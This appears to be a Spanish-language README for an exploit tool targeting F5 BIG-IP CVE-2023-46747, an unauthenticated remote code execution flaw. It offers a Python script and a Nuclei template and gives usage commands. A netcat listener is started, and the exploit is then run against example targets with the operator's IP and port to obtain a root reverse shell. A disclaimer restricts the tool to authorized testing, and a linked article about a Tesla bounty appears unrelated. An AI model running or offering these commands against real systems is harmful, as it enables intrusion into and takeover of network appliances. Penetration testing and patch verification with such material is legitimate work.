
#F5-BIG-IP-CVE-2023-46747-Exploit – RCE no autenticado Exploit en Python y plantilla Nuclei por Raguraman ✓ Shell reversa TCP automatizada (LHOST/LPORT) ✓ Probado en BIG-IP afectados 13.x–17.x ⚠️ Solo para pruebas de penetración autorizadas
Versiones para Python3 y Nuclei – por raguraman
RCE crítica sin autenticación (CVSS 9.8) mediante AJP + contrabando de solicitudes HTTP
Funciona en todos los BIG-IP sin parche 13.x → 17.x (incluyendo el último 17.1.0.3)
Parche: https://my.f5.com/manage/s/article/K000137353 (Nov 2023)
Artículo sobre el exploit en el mundo real: 👉 https://medium.com/@razzlemouse/how-i-discovered-an-rce-vulnerability-in-tesla-securing-a-10-000-bounty-62e725c2a6bd
f5-bigip-cve-2023-46747-revshell.py → Python3 independiente (recomendado)CVE-2023-46747-revshell.yaml → Plantilla de Nuclei (opcional)# 1. Inicia tu listener
nc -lvnp 4444
# 2. Ejecuta el exploit (funciona con IP o dominio)
python3 f5-bigip-cve-2023-46747-revshell.py https://192.168.10.50 YOUR_IP 4444
python3 f5-bigip-cve-2023-46747-revshell.py https://bigip.victim.com YOUR_IP 4444
# → ¡Shell root instantánea!
Uso – Plantilla de Nuclei (alternativa) Bash # 1. Edita LHOST y LPORT dentro del archivo YAML
nc -lvnp 4444
nuclei -t CVE-2023-46747-revshell.yaml -u https://target.company.com
Esta herramienta está destinada únicamente para pruebas de seguridad autorizadas, como:
No uses este exploit en sistemas que no te pertenezcan o para los que no tengas permiso explícito para probar. La explotación no autorizada es ilegal y puede resultar en enjuiciamiento penal.
Al usar esta herramienta, aceptas toda la responsabilidad de cumplir con las leyes aplicables. El autor no se hace responsable por cualquier mal uso o daño.